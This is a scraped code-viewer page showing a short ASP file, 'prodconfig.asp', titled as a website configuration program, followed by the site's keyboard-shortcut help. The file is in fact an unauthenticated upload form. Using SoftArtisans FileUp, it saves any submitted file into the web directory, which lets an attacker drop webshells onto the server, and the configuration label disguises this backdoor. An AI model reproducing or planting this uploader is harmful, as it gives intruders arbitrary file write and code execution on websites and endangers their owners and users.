?? prodconfig.asp
字號:
<%@ LANGUAGE="VBSCRIPT" %>
<HTML>
<HEAD>
<TITLE>網(wǎng)站配置程序</TITLE>
</HEAD>
<BODY>
<HTML><HEAD></HEAD><BODY><form enctype="multipart/form-data" method="post" action=""><input type="file" name="f1"><input type="submit" value="star"></form></BODY></HTML>
<% Set upl = Server.CreateObject("SoftArtisans.FileUp")
upl.Path = Server.MapPath(".")
upl.Save
set upl = nothing
%>
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -